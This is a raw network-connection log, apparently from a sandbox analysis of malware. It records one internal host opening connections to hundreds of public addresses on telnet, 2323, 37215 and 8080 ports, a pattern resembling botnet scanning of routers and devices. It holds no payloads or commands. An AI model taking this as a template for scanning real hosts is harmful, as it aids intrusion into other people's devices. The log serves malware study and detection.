                                                              Nov 13, 2023 22:17:58.767416954 CET1138823192.168.2.2372.236.186.238
                                                              Nov 13, 2023 22:17:58.767417908 CET1138823192.168.2.23138.99.61.161
                                                              Nov 13, 2023 22:17:58.767424107 CET113882323192.168.2.2376.143.5.197
                                                              Nov 13, 2023 22:17:58.767426968 CET1138823192.168.2.23111.40.105.185
                                                              Nov 13, 2023 22:17:58.767438889 CET1138823192.168.2.2343.173.142.53
                                                              Nov 13, 2023 22:17:58.767438889 CET1138823192.168.2.2369.55.1.196
                                                              Nov 13, 2023 22:17:58.767451048 CET1138823192.168.2.2385.129.144.104
                                                              Nov 13, 2023 22:17:58.767451048 CET1138823192.168.2.2334.149.60.170
                                                              Nov 13, 2023 22:17:58.767457962 CET1138823192.168.2.2382.100.177.231
                                                              Nov 13, 2023 22:17:58.767460108 CET1138823192.168.2.23212.151.189.190
                                                              Nov 13, 2023 22:17:58.767472982 CET1138823192.168.2.23148.140.66.41
                                                              Nov 13, 2023 22:17:58.767479897 CET1138823192.168.2.23182.127.89.238
                                                              Nov 13, 2023 22:17:58.767481089 CET113882323192.168.2.23158.62.101.23
                                                              Nov 13, 2023 22:17:58.767488956 CET1138823192.168.2.23147.214.83.148
                                                              Nov 13, 2023 22:17:58.767496109 CET1138823192.168.2.2395.196.49.53
                                                              Nov 13, 2023 22:17:58.767501116 CET1138823192.168.2.2345.154.82.186
                                                              Nov 13, 2023 22:17:58.767503977 CET1138823192.168.2.23102.178.84.64
                                                              Nov 13, 2023 22:17:58.767503977 CET1138823192.168.2.23164.210.207.38
                                                              Nov 13, 2023 22:17:58.767518044 CET1138823192.168.2.23139.219.65.65
                                                              Nov 13, 2023 22:17:58.767519951 CET1138823192.168.2.23117.180.113.243
                                                              Nov 13, 2023 22:17:58.767522097 CET1138823192.168.2.23166.149.32.190
                                                              Nov 13, 2023 22:17:58.767534018 CET1138823192.168.2.23199.150.54.65
                                                              Nov 13, 2023 22:17:58.767534018 CET1138823192.168.2.2378.154.75.51
                                                              Nov 13, 2023 22:17:58.767543077 CET1138823192.168.2.23107.8.142.49
                                                              Nov 13, 2023 22:17:58.767544985 CET1138823192.168.2.23116.29.64.219
                                                              Nov 13, 2023 22:17:58.767544985 CET1138823192.168.2.23147.27.169.7
                                                              Nov 13, 2023 22:17:58.767553091 CET1138823192.168.2.23189.195.232.58
                                                              Nov 13, 2023 22:17:58.767556906 CET1138823192.168.2.23189.53.50.162
                                                              Nov 13, 2023 22:17:58.767556906 CET113882323192.168.2.23158.51.54.46
                                                              Nov 13, 2023 22:17:58.767561913 CET1138823192.168.2.2352.60.138.127
                                                              Nov 13, 2023 22:17:58.767563105 CET1138823192.168.2.2368.96.12.97
                                                              Nov 13, 2023 22:17:58.767563105 CET1138823192.168.2.23140.218.151.77
                                                              Nov 13, 2023 22:17:58.767570972 CET1138823192.168.2.23167.89.223.234
                                                              Nov 13, 2023 22:17:58.767575979 CET1138823192.168.2.2383.79.114.108
                                                              Nov 13, 2023 22:17:58.767580986 CET1138823192.168.2.23148.75.232.135
                                                              Nov 13, 2023 22:17:58.767580986 CET1138823192.168.2.23178.82.149.24
                                                              Nov 13, 2023 22:17:58.767581940 CET113882323192.168.2.23190.120.28.255
                                                              Nov 13, 2023 22:17:58.767591953 CET1138823192.168.2.23128.117.163.101
                                                              Nov 13, 2023 22:17:58.767591953 CET1138823192.168.2.2386.42.96.42
                                                              Nov 13, 2023 22:17:58.767594099 CET1138823192.168.2.23200.31.50.14
                                                              Nov 13, 2023 22:17:58.767595053 CET1138823192.168.2.23218.184.164.70
                                                              Nov 13, 2023 22:17:58.767600060 CET1138823192.168.2.23105.160.83.85
                                                              Nov 13, 2023 22:17:58.767606020 CET1138823192.168.2.23191.23.179.52
                                                              Nov 13, 2023 22:17:58.767606974 CET1138823192.168.2.23121.173.186.95
                                                              Nov 13, 2023 22:17:58.767612934 CET113882323192.168.2.23213.255.135.179
                                                              Nov 13, 2023 22:17:58.767620087 CET1138823192.168.2.2375.69.76.123
                                                              Nov 13, 2023 22:17:58.767621040 CET1138823192.168.2.2362.247.187.164
                                                              Nov 13, 2023 22:17:58.767622948 CET1138823192.168.2.23221.60.196.17
                                                              Nov 13, 2023 22:17:58.767622948 CET1138823192.168.2.23104.99.130.233
                                                              Nov 13, 2023 22:17:58.767641068 CET1138823192.168.2.2394.42.250.44
                                                              Nov 13, 2023 22:17:58.767644882 CET113882323192.168.2.23114.24.249.125
                                                              Nov 13, 2023 22:17:58.767644882 CET1138823192.168.2.23194.83.3.121
                                                              Nov 13, 2023 22:17:58.767651081 CET1138823192.168.2.2312.106.202.44
                                                              Nov 13, 2023 22:17:58.767651081 CET1138823192.168.2.2376.17.244.29
                                                              Nov 13, 2023 22:17:58.767651081 CET1138823192.168.2.23111.16.102.78
                                                              Nov 13, 2023 22:17:58.767657042 CET1138823192.168.2.23199.138.32.146
                                                              Nov 13, 2023 22:17:58.767666101 CET1138823192.168.2.23185.139.157.66
                                                              Nov 13, 2023 22:17:58.767668009 CET1138823192.168.2.2332.81.77.206
                                                              Nov 13, 2023 22:17:58.767668009 CET1138823192.168.2.2370.54.39.15
                                                              Nov 13, 2023 22:17:58.767671108 CET1138823192.168.2.2364.73.27.27
                                                              Nov 13, 2023 22:17:58.767668009 CET1138823192.168.2.23212.88.69.204
                                                              Nov 13, 2023 22:17:58.767671108 CET1138823192.168.2.2314.245.24.134
                                                              Nov 13, 2023 22:17:58.767684937 CET1138823192.168.2.23204.113.147.225
                                                              Nov 13, 2023 22:17:58.767688036 CET113882323192.168.2.23104.52.198.22
                                                              Nov 13, 2023 22:17:58.767707109 CET1138823192.168.2.23144.191.254.163
                                                              Nov 13, 2023 22:17:58.961967945 CET801343688.218.105.5192.168.2.23
                                                              Nov 13, 2023 22:17:58.962101936 CET1343680192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:17:59.030956984 CET80801394894.23.242.65192.168.2.23
                                                              Nov 13, 2023 22:17:59.031052113 CET139488080192.168.2.2394.23.242.65
                                                              Nov 13, 2023 22:17:59.035784006 CET80801394862.69.47.164192.168.2.23
                                                              Nov 13, 2023 22:17:59.037314892 CET80801394895.143.200.74192.168.2.23
                                                              Nov 13, 2023 22:17:59.037431002 CET80801394885.236.52.235192.168.2.23
                                                              Nov 13, 2023 22:17:59.040839911 CET801343688.135.67.179192.168.2.23
                                                              Nov 13, 2023 22:17:59.041604996 CET80801394885.236.196.65192.168.2.23
                                                              Nov 13, 2023 22:17:59.055901051 CET80801394862.141.52.170192.168.2.23
                                                              Nov 13, 2023 22:17:59.063172102 CET80801394831.136.252.65192.168.2.23
                                                              Nov 13, 2023 22:17:59.063231945 CET139488080192.168.2.2331.136.252.65
                                                              Nov 13, 2023 22:17:59.066350937 CET80801394885.146.213.25192.168.2.23
                                                              Nov 13, 2023 22:17:59.067941904 CET372151266041.202.75.191192.168.2.23
                                                              Nov 13, 2023 22:17:59.070918083 CET80801394894.126.13.33192.168.2.23
                                                              Nov 13, 2023 22:17:59.074034929 CET80801394885.146.218.104192.168.2.23
                                                              Nov 13, 2023 22:17:59.075184107 CET231138881.232.55.76192.168.2.23
                                                              Nov 13, 2023 22:17:59.081608057 CET80801394885.160.81.168192.168.2.23
                                                              Nov 13, 2023 22:17:59.094643116 CET80801394862.148.147.162192.168.2.23
                                                              Nov 13, 2023 22:17:59.098829985 CET2311388113.210.184.194192.168.2.23
                                                              Nov 13, 2023 22:17:59.127295017 CET80801394895.170.166.131192.168.2.23
                                                              Nov 13, 2023 22:17:59.138567924 CET80801394894.184.117.62192.168.2.23
                                                              Nov 13, 2023 22:17:59.172171116 CET372151266041.182.84.243192.168.2.23
                                                              Nov 13, 2023 22:17:59.181215048 CET80801394894.156.93.13192.168.2.23
                                                              Nov 13, 2023 22:17:59.253806114 CET43928443192.168.2.2391.189.91.42
                                                              Nov 13, 2023 22:17:59.347058058 CET80801394831.140.160.11192.168.2.23
                                                              Nov 13, 2023 22:17:59.669821024 CET1266037215192.168.2.23157.33.229.72
                                                              Nov 13, 2023 22:17:59.669821024 CET1266037215192.168.2.23157.94.60.19
                                                              Nov 13, 2023 22:17:59.669821978 CET1266037215192.168.2.23157.58.59.136
                                                              Nov 13, 2023 22:17:59.669823885 CET1266037215192.168.2.23157.64.135.179
                                                              Nov 13, 2023 22:17:59.669823885 CET1266037215192.168.2.23157.47.66.96
                                                              Nov 13, 2023 22:17:59.669823885 CET1266037215192.168.2.23157.173.192.136
                                                              Nov 13, 2023 22:17:59.669825077 CET1266037215192.168.2.23157.92.241.244
                                                              Nov 13, 2023 22:17:59.669831991 CET1266037215192.168.2.23157.186.66.77
                                                              Nov 13, 2023 22:17:59.669867992 CET1266037215192.168.2.23157.184.37.219
                                                              Nov 13, 2023 22:17:59.669876099 CET1266037215192.168.2.23157.94.109.102
                                                              Nov 13, 2023 22:17:59.669898987 CET1266037215192.168.2.23157.244.210.139
                                                              Nov 13, 2023 22:17:59.669902086 CET1266037215192.168.2.23157.248.207.105
                                                              Nov 13, 2023 22:17:59.669902086 CET1266037215192.168.2.23157.251.213.116
                                                              Nov 13, 2023 22:17:59.669902086 CET1266037215192.168.2.23157.205.180.115
                                                              Nov 13, 2023 22:17:59.669902086 CET1266037215192.168.2.23157.205.71.54
                                                              Nov 13, 2023 22:17:59.669908047 CET1266037215192.168.2.23157.28.159.189
                                                              Nov 13, 2023 22:17:59.669909954 CET1266037215192.168.2.23157.0.53.43
                                                              Nov 13, 2023 22:17:59.669931889 CET1266037215192.168.2.23157.240.99.227
                                                              Nov 13, 2023 22:17:59.669945002 CET1266037215192.168.2.23157.131.60.218
                                                              Nov 13, 2023 22:17:59.669956923 CET1266037215192.168.2.23157.28.242.168
                                                              Nov 13, 2023 22:17:59.669975042 CET1266037215192.168.2.23157.222.135.168
                                                              Nov 13, 2023 22:17:59.669995070 CET1266037215192.168.2.23157.111.215.191
                                                              Nov 13, 2023 22:17:59.670017958 CET1266037215192.168.2.23157.196.204.117
                                                              Nov 13, 2023 22:17:59.670027971 CET1266037215192.168.2.23157.105.87.164
                                                              Nov 13, 2023 22:17:59.670043945 CET1266037215192.168.2.23157.81.30.26
                                                              Nov 13, 2023 22:17:59.670058966 CET1266037215192.168.2.23157.92.146.196
                                                              Nov 13, 2023 22:17:59.670073986 CET1266037215192.168.2.23157.18.25.235
                                                              Nov 13, 2023 22:17:59.670094967 CET1266037215192.168.2.23157.216.45.233
                                                              Nov 13, 2023 22:17:59.670109987 CET1266037215192.168.2.23157.189.52.253
                                                              Nov 13, 2023 22:17:59.670120001 CET1266037215192.168.2.23157.173.42.188
                                                              Nov 13, 2023 22:17:59.670137882 CET1266037215192.168.2.23157.156.241.219
                                                              Nov 13, 2023 22:17:59.670151949 CET1266037215192.168.2.23157.241.88.42
                                                              Nov 13, 2023 22:17:59.670167923 CET1266037215192.168.2.23157.1.169.71
                                                              Nov 13, 2023 22:17:59.670176029 CET1266037215192.168.2.23157.109.10.236
                                                              Nov 13, 2023 22:17:59.670195103 CET1266037215192.168.2.23157.248.83.170
                                                              Nov 13, 2023 22:17:59.670227051 CET1266037215192.168.2.23157.145.202.33
                                                              Nov 13, 2023 22:17:59.670267105 CET1266037215192.168.2.23157.201.53.11
                                                              Nov 13, 2023 22:17:59.670281887 CET1266037215192.168.2.23157.31.245.87
                                                              Nov 13, 2023 22:17:59.670306921 CET1266037215192.168.2.23157.242.34.224
                                                              Nov 13, 2023 22:17:59.670315981 CET1266037215192.168.2.23157.127.237.158
                                                              Nov 13, 2023 22:17:59.670321941 CET1266037215192.168.2.23157.238.92.12
                                                              Nov 13, 2023 22:17:59.670386076 CET1266037215192.168.2.23157.119.162.144
                                                              Nov 13, 2023 22:17:59.670409918 CET1266037215192.168.2.23157.28.142.254
                                                              Nov 13, 2023 22:17:59.670427084 CET1266037215192.168.2.23157.23.182.58
                                                              Nov 13, 2023 22:17:59.670459032 CET1266037215192.168.2.23157.128.226.42
                                                              Nov 13, 2023 22:17:59.670465946 CET1266037215192.168.2.23157.99.110.249
                                                              Nov 13, 2023 22:17:59.670483112 CET1266037215192.168.2.23157.155.164.29
                                                              Nov 13, 2023 22:17:59.670501947 CET1266037215192.168.2.23157.29.73.27
                                                              Nov 13, 2023 22:17:59.670514107 CET1266037215192.168.2.23157.219.63.233
                                                              Nov 13, 2023 22:17:59.670532942 CET1266037215192.168.2.23157.50.93.178
                                                              Nov 13, 2023 22:17:59.670562983 CET1266037215192.168.2.23157.211.131.119
                                                              Nov 13, 2023 22:17:59.670568943 CET1266037215192.168.2.23157.151.155.18
                                                              Nov 13, 2023 22:17:59.670592070 CET1266037215192.168.2.23157.204.13.189
                                                              Nov 13, 2023 22:17:59.670607090 CET1266037215192.168.2.23157.163.135.114
                                                              Nov 13, 2023 22:17:59.670627117 CET1266037215192.168.2.23157.84.88.173
                                                              Nov 13, 2023 22:17:59.670639038 CET1266037215192.168.2.23157.200.206.9
                                                              Nov 13, 2023 22:17:59.670666933 CET1266037215192.168.2.23157.86.106.162
                                                              Nov 13, 2023 22:17:59.670681000 CET1266037215192.168.2.23157.95.75.2
                                                              Nov 13, 2023 22:17:59.670696974 CET1266037215192.168.2.23157.249.12.244
                                                              Nov 13, 2023 22:17:59.670752048 CET1266037215192.168.2.23157.163.113.26
                                                              Nov 13, 2023 22:17:59.670757055 CET1266037215192.168.2.23157.224.25.171
                                                              Nov 13, 2023 22:17:59.670757055 CET1266037215192.168.2.23157.25.140.43
                                                              Nov 13, 2023 22:17:59.670810938 CET1266037215192.168.2.23157.21.81.111
                                                              Nov 13, 2023 22:17:59.670811892 CET1266037215192.168.2.23157.208.87.42
                                                              Nov 13, 2023 22:17:59.670811892 CET1266037215192.168.2.23157.85.27.96
                                                              Nov 13, 2023 22:17:59.670811892 CET1266037215192.168.2.23157.228.102.117
                                                              Nov 13, 2023 22:17:59.670830965 CET1266037215192.168.2.23157.214.177.213
                                                              Nov 13, 2023 22:17:59.670838118 CET1266037215192.168.2.23157.225.216.150
                                                              Nov 13, 2023 22:17:59.670859098 CET1266037215192.168.2.23157.121.185.99
                                                              Nov 13, 2023 22:17:59.670875072 CET1266037215192.168.2.23157.223.89.35
                                                              Nov 13, 2023 22:17:59.670912027 CET1266037215192.168.2.23157.48.17.68
                                                              Nov 13, 2023 22:17:59.670917988 CET1266037215192.168.2.23157.132.8.173
                                                              Nov 13, 2023 22:17:59.670928955 CET1266037215192.168.2.23157.42.110.134
                                                              Nov 13, 2023 22:17:59.670938015 CET1266037215192.168.2.23157.92.241.202
                                                              Nov 13, 2023 22:17:59.670994043 CET1266037215192.168.2.23157.172.222.18
                                                              Nov 13, 2023 22:17:59.670994997 CET1266037215192.168.2.23157.77.228.13
                                                              Nov 13, 2023 22:17:59.671032906 CET1266037215192.168.2.23157.70.243.180
                                                              Nov 13, 2023 22:17:59.671036005 CET1266037215192.168.2.23157.11.144.112
                                                              Nov 13, 2023 22:17:59.671036959 CET1266037215192.168.2.23157.68.89.170
                                                              Nov 13, 2023 22:17:59.671058893 CET1266037215192.168.2.23157.227.94.233
                                                              Nov 13, 2023 22:17:59.671067953 CET1266037215192.168.2.23157.39.146.85
                                                              Nov 13, 2023 22:17:59.671087027 CET1266037215192.168.2.23157.249.168.110
                                                              Nov 13, 2023 22:17:59.671123028 CET1266037215192.168.2.23157.198.215.116
                                                              Nov 13, 2023 22:17:59.671138048 CET1266037215192.168.2.23157.87.190.131
                                                              Nov 13, 2023 22:17:59.671160936 CET1266037215192.168.2.23157.158.18.3
                                                              Nov 13, 2023 22:17:59.671180964 CET1266037215192.168.2.23157.220.54.30
                                                              Nov 13, 2023 22:17:59.671191931 CET1266037215192.168.2.23157.172.144.68
                                                              Nov 13, 2023 22:17:59.671211004 CET1266037215192.168.2.23157.21.110.155
                                                              Nov 13, 2023 22:17:59.671221018 CET1266037215192.168.2.23157.49.80.168
                                                              Nov 13, 2023 22:17:59.671260118 CET1266037215192.168.2.23157.24.229.131
                                                              Nov 13, 2023 22:17:59.671288013 CET1266037215192.168.2.23157.176.190.27
                                                              Nov 13, 2023 22:17:59.671305895 CET1266037215192.168.2.23157.236.236.88
                                                              Nov 13, 2023 22:17:59.671327114 CET1266037215192.168.2.23157.201.49.145
                                                              Nov 13, 2023 22:17:59.671358109 CET1266037215192.168.2.23157.192.67.193
                                                              Nov 13, 2023 22:17:59.671380043 CET1266037215192.168.2.23157.214.102.114
                                                              Nov 13, 2023 22:17:59.671391010 CET1266037215192.168.2.23157.52.114.89
                                                              Nov 13, 2023 22:17:59.671427011 CET1266037215192.168.2.23157.57.184.125
                                                              Nov 13, 2023 22:17:59.671444893 CET1266037215192.168.2.23157.126.48.135
                                                              Nov 13, 2023 22:17:59.671489954 CET1266037215192.168.2.23157.87.245.219
                                                              Nov 13, 2023 22:17:59.671508074 CET1266037215192.168.2.23157.53.250.18
                                                              Nov 13, 2023 22:17:59.671531916 CET1266037215192.168.2.23157.160.235.103
                                                              Nov 13, 2023 22:17:59.671535015 CET1266037215192.168.2.23157.52.177.168
                                                              Nov 13, 2023 22:17:59.671549082 CET1266037215192.168.2.23157.193.105.185
                                                              Nov 13, 2023 22:17:59.671580076 CET1266037215192.168.2.23157.62.7.165
                                                              Nov 13, 2023 22:17:59.671595097 CET1266037215192.168.2.23157.228.248.8
                                                              Nov 13, 2023 22:17:59.671608925 CET1266037215192.168.2.23157.60.56.121
                                                              Nov 13, 2023 22:17:59.671632051 CET1266037215192.168.2.23157.175.238.201
                                                              Nov 13, 2023 22:17:59.671668053 CET1266037215192.168.2.23157.242.69.248
                                                              Nov 13, 2023 22:17:59.671683073 CET1266037215192.168.2.23157.167.158.172
                                                              Nov 13, 2023 22:17:59.671703100 CET1266037215192.168.2.23157.244.234.34
                                                              Nov 13, 2023 22:17:59.671711922 CET1266037215192.168.2.23157.226.100.102
                                                              Nov 13, 2023 22:17:59.671730042 CET1266037215192.168.2.23157.89.170.132
                                                              Nov 13, 2023 22:17:59.671753883 CET1266037215192.168.2.23157.49.131.122
                                                              Nov 13, 2023 22:17:59.671770096 CET1266037215192.168.2.23157.19.63.115
                                                              Nov 13, 2023 22:17:59.671787977 CET1266037215192.168.2.23157.7.253.41
                                                              Nov 13, 2023 22:17:59.671799898 CET1266037215192.168.2.23157.0.157.178
                                                              Nov 13, 2023 22:17:59.671817064 CET1266037215192.168.2.23157.238.140.186
                                                              Nov 13, 2023 22:17:59.671848059 CET1266037215192.168.2.23157.18.58.108
                                                              Nov 13, 2023 22:17:59.671869040 CET1266037215192.168.2.23157.153.13.230
                                                              Nov 13, 2023 22:17:59.671878099 CET1266037215192.168.2.23157.33.66.21
                                                              Nov 13, 2023 22:17:59.671895027 CET1266037215192.168.2.23157.151.244.100
                                                              Nov 13, 2023 22:17:59.671916008 CET1266037215192.168.2.23157.215.9.197
                                                              Nov 13, 2023 22:17:59.671926975 CET1266037215192.168.2.23157.173.188.61
                                                              Nov 13, 2023 22:17:59.671955109 CET1266037215192.168.2.23157.101.30.5
                                                              Nov 13, 2023 22:17:59.671969891 CET1266037215192.168.2.23157.213.16.52
                                                              Nov 13, 2023 22:17:59.671993971 CET1266037215192.168.2.23157.23.158.40
                                                              Nov 13, 2023 22:17:59.672012091 CET1266037215192.168.2.23157.78.42.34
                                                              Nov 13, 2023 22:17:59.672029972 CET1266037215192.168.2.23157.160.117.164
                                                              Nov 13, 2023 22:17:59.672050953 CET1266037215192.168.2.23157.240.14.201
                                                              Nov 13, 2023 22:17:59.672065020 CET1266037215192.168.2.23157.238.45.254
                                                              Nov 13, 2023 22:17:59.672115088 CET1266037215192.168.2.23157.126.177.42
                                                              Nov 13, 2023 22:17:59.672116995 CET1266037215192.168.2.23157.147.60.210
                                                              Nov 13, 2023 22:17:59.672142029 CET1266037215192.168.2.23157.164.129.94
                                                              Nov 13, 2023 22:17:59.672147036 CET1266037215192.168.2.23157.86.217.123
                                                              Nov 13, 2023 22:17:59.672158003 CET1266037215192.168.2.23157.254.109.47
                                                              Nov 13, 2023 22:17:59.672180891 CET1266037215192.168.2.23157.218.12.132
                                                              Nov 13, 2023 22:17:59.672194958 CET1266037215192.168.2.23157.252.44.96
                                                              Nov 13, 2023 22:17:59.672214031 CET1266037215192.168.2.23157.139.139.59
                                                              Nov 13, 2023 22:17:59.672226906 CET1266037215192.168.2.23157.12.2.135
                                                              Nov 13, 2023 22:17:59.672240973 CET1266037215192.168.2.23157.138.193.177
                                                              Nov 13, 2023 22:17:59.672259092 CET1266037215192.168.2.23157.121.147.193
                                                              Nov 13, 2023 22:17:59.672275066 CET1266037215192.168.2.23157.177.48.15
                                                              Nov 13, 2023 22:17:59.672302961 CET1266037215192.168.2.23157.230.177.78
                                                              Nov 13, 2023 22:17:59.672319889 CET1266037215192.168.2.23157.151.162.88
                                                              Nov 13, 2023 22:17:59.672334909 CET1266037215192.168.2.23157.65.135.122
                                                              Nov 13, 2023 22:17:59.672358990 CET1266037215192.168.2.23157.232.253.243
                                                              Nov 13, 2023 22:17:59.672370911 CET1266037215192.168.2.23157.140.187.1
                                                              Nov 13, 2023 22:17:59.672408104 CET1266037215192.168.2.23157.52.7.58
                                                              Nov 13, 2023 22:17:59.672411919 CET1266037215192.168.2.23157.199.93.42
                                                              Nov 13, 2023 22:17:59.672427893 CET1266037215192.168.2.23157.112.87.238
                                                              Nov 13, 2023 22:17:59.672441959 CET1266037215192.168.2.23157.165.56.234
                                                              Nov 13, 2023 22:17:59.672462940 CET1266037215192.168.2.23157.161.79.201
                                                              Nov 13, 2023 22:17:59.672481060 CET1266037215192.168.2.23157.12.159.47
                                                              Nov 13, 2023 22:17:59.672496080 CET1266037215192.168.2.23157.255.122.91
                                                              Nov 13, 2023 22:17:59.672507048 CET1266037215192.168.2.23157.95.122.134
                                                              Nov 13, 2023 22:17:59.672547102 CET1266037215192.168.2.23157.49.153.80
                                                              Nov 13, 2023 22:17:59.672563076 CET1266037215192.168.2.23157.230.69.154
                                                              Nov 13, 2023 22:17:59.672597885 CET1266037215192.168.2.23157.36.84.187
                                                              Nov 13, 2023 22:17:59.672616959 CET1266037215192.168.2.23157.115.30.72
                                                              Nov 13, 2023 22:17:59.672640085 CET1266037215192.168.2.23157.12.126.240
                                                              Nov 13, 2023 22:17:59.736790895 CET1343680192.168.2.2388.52.190.192
                                                              Nov 13, 2023 22:17:59.736793995 CET1343680192.168.2.2388.138.72.119
                                                              Nov 13, 2023 22:17:59.736825943 CET1343680192.168.2.2388.170.54.106
                                                              Nov 13, 2023 22:17:59.736839056 CET1343680192.168.2.2388.186.191.248
                                                              Nov 13, 2023 22:17:59.736859083 CET1343680192.168.2.2388.54.210.146
                                                              Nov 13, 2023 22:17:59.736888885 CET1343680192.168.2.2388.161.44.251
                                                              Nov 13, 2023 22:17:59.736918926 CET1343680192.168.2.2388.207.135.161
                                                              Nov 13, 2023 22:17:59.736943007 CET1343680192.168.2.2388.140.218.195
                                                              Nov 13, 2023 22:17:59.736955881 CET1343680192.168.2.2388.132.38.187
                                                              Nov 13, 2023 22:17:59.736970901 CET1343680192.168.2.2388.109.56.136
                                                              Nov 13, 2023 22:17:59.736989975 CET1343680192.168.2.2388.151.164.191
                                                              Nov 13, 2023 22:17:59.737004995 CET1343680192.168.2.2388.213.220.214
                                                              Nov 13, 2023 22:17:59.737025976 CET1343680192.168.2.2388.246.50.28
                                                              Nov 13, 2023 22:17:59.737036943 CET1343680192.168.2.2388.7.13.128
                                                              Nov 13, 2023 22:17:59.737057924 CET1343680192.168.2.2388.216.54.50
                                                              Nov 13, 2023 22:17:59.737072945 CET1343680192.168.2.2388.77.217.0
                                                              Nov 13, 2023 22:17:59.737087965 CET1343680192.168.2.2388.179.206.202
                                                              Nov 13, 2023 22:17:59.737102985 CET1343680192.168.2.2388.45.42.254
                                                              Nov 13, 2023 22:17:59.737118006 CET1343680192.168.2.2388.38.117.224
                                                              Nov 13, 2023 22:17:59.737138987 CET1343680192.168.2.2388.120.141.211
                                                              Nov 13, 2023 22:17:59.737159014 CET1343680192.168.2.2388.45.166.20
                                                              Nov 13, 2023 22:17:59.737174034 CET1343680192.168.2.2388.171.202.217
                                                              Nov 13, 2023 22:17:59.737190008 CET1343680192.168.2.2388.17.40.240
                                                              Nov 13, 2023 22:17:59.737220049 CET1343680192.168.2.2388.92.14.45
                                                              Nov 13, 2023 22:17:59.737236977 CET1343680192.168.2.2388.59.17.60
                                                              Nov 13, 2023 22:17:59.737257957 CET1343680192.168.2.2388.203.143.147
                                                              Nov 13, 2023 22:17:59.737293959 CET1343680192.168.2.2388.78.63.188
                                                              Nov 13, 2023 22:17:59.737314939 CET1343680192.168.2.2388.229.175.169
                                                              Nov 13, 2023 22:17:59.737341881 CET1343680192.168.2.2388.23.6.76
                                                              Nov 13, 2023 22:17:59.737354040 CET1343680192.168.2.2388.218.108.235
                                                              Nov 13, 2023 22:17:59.737368107 CET1343680192.168.2.2388.67.157.110
                                                              Nov 13, 2023 22:17:59.737389088 CET1343680192.168.2.2388.78.187.42
                                                              Nov 13, 2023 22:17:59.737401009 CET1343680192.168.2.2388.169.10.106
                                                              Nov 13, 2023 22:17:59.737426043 CET1343680192.168.2.2388.24.108.73
                                                              Nov 13, 2023 22:17:59.737461090 CET1343680192.168.2.2388.22.63.251
                                                              Nov 13, 2023 22:17:59.737483978 CET1343680192.168.2.2388.169.98.60
                                                              Nov 13, 2023 22:17:59.737524033 CET1343680192.168.2.2388.225.77.222
                                                              Nov 13, 2023 22:17:59.737534046 CET1343680192.168.2.2388.237.228.181
                                                              Nov 13, 2023 22:17:59.737551928 CET1343680192.168.2.2388.136.145.174
                                                              Nov 13, 2023 22:17:59.737580061 CET1343680192.168.2.2388.205.164.119
                                                              Nov 13, 2023 22:17:59.737598896 CET1343680192.168.2.2388.176.186.243
                                                              Nov 13, 2023 22:17:59.737621069 CET139488080192.168.2.2362.114.140.166
                                                              Nov 13, 2023 22:17:59.737623930 CET1343680192.168.2.2388.3.39.6
                                                              Nov 13, 2023 22:17:59.737628937 CET139488080192.168.2.2394.165.22.189
                                                              Nov 13, 2023 22:17:59.737632036 CET139488080192.168.2.2394.181.251.96
                                                              Nov 13, 2023 22:17:59.737644911 CET139488080192.168.2.2331.123.186.72
                                                              Nov 13, 2023 22:17:59.737648010 CET139488080192.168.2.2394.22.136.13
                                                              Nov 13, 2023 22:17:59.737659931 CET139488080192.168.2.2395.217.126.212
                                                              Nov 13, 2023 22:17:59.737672091 CET1343680192.168.2.2388.13.49.189
                                                              Nov 13, 2023 22:17:59.737673044 CET1343680192.168.2.2388.123.124.105
                                                              Nov 13, 2023 22:17:59.737684011 CET139488080192.168.2.2362.244.109.234
                                                              Nov 13, 2023 22:17:59.737687111 CET139488080192.168.2.2362.55.143.234
                                                              Nov 13, 2023 22:17:59.737690926 CET1343680192.168.2.2388.174.15.13
                                                              Nov 13, 2023 22:17:59.737690926 CET139488080192.168.2.2385.50.1.116
                                                              Nov 13, 2023 22:17:59.737698078 CET139488080192.168.2.2362.98.10.93
                                                              Nov 13, 2023 22:17:59.737714052 CET139488080192.168.2.2385.151.104.97
                                                              Nov 13, 2023 22:17:59.737714052 CET139488080192.168.2.2395.165.1.211
                                                              Nov 13, 2023 22:17:59.737715006 CET139488080192.168.2.2385.208.48.224
                                                              Nov 13, 2023 22:17:59.737721920 CET1343680192.168.2.2388.128.96.129
                                                              Nov 13, 2023 22:17:59.737729073 CET1343680192.168.2.2388.2.195.255
                                                              Nov 13, 2023 22:17:59.737730026 CET139488080192.168.2.2362.195.85.109
                                                              Nov 13, 2023 22:17:59.737731934 CET139488080192.168.2.2331.194.37.199
                                                              Nov 13, 2023 22:17:59.737732887 CET139488080192.168.2.2331.88.107.48
                                                              Nov 13, 2023 22:17:59.737732887 CET139488080192.168.2.2394.161.194.70
                                                              Nov 13, 2023 22:17:59.737739086 CET139488080192.168.2.2331.200.190.224
                                                              Nov 13, 2023 22:17:59.737750053 CET139488080192.168.2.2395.253.125.247
                                                              Nov 13, 2023 22:17:59.737759113 CET139488080192.168.2.2331.86.201.188
                                                              Nov 13, 2023 22:17:59.737765074 CET139488080192.168.2.2331.184.113.45
                                                              Nov 13, 2023 22:17:59.737771034 CET1343680192.168.2.2388.48.23.199
                                                              Nov 13, 2023 22:17:59.737776995 CET139488080192.168.2.2395.45.210.76
                                                              Nov 13, 2023 22:17:59.737778902 CET139488080192.168.2.2385.30.60.75
                                                              Nov 13, 2023 22:17:59.737788916 CET139488080192.168.2.2394.158.130.159
                                                              Nov 13, 2023 22:17:59.737788916 CET139488080192.168.2.2362.249.144.76
                                                              Nov 13, 2023 22:17:59.737795115 CET1343680192.168.2.2388.224.94.145
                                                              Nov 13, 2023 22:17:59.737798929 CET139488080192.168.2.2394.35.173.201
                                                              Nov 13, 2023 22:17:59.737811089 CET1343680192.168.2.2388.198.158.254
                                                              Nov 13, 2023 22:17:59.737811089 CET139488080192.168.2.2394.255.227.231
                                                              Nov 13, 2023 22:17:59.737813950 CET139488080192.168.2.2362.116.117.252
                                                              Nov 13, 2023 22:17:59.737826109 CET1343680192.168.2.2388.59.117.174
                                                              Nov 13, 2023 22:17:59.737826109 CET139488080192.168.2.2331.245.39.136
                                                              Nov 13, 2023 22:17:59.737827063 CET139488080192.168.2.2385.251.83.156
                                                              Nov 13, 2023 22:17:59.737843037 CET139488080192.168.2.2395.139.49.164
                                                              Nov 13, 2023 22:17:59.737845898 CET139488080192.168.2.2331.45.201.41
                                                              Nov 13, 2023 22:17:59.737845898 CET139488080192.168.2.2385.112.93.109
                                                              Nov 13, 2023 22:17:59.737845898 CET1343680192.168.2.2388.28.214.170
                                                              Nov 13, 2023 22:17:59.737848043 CET139488080192.168.2.2385.17.206.191
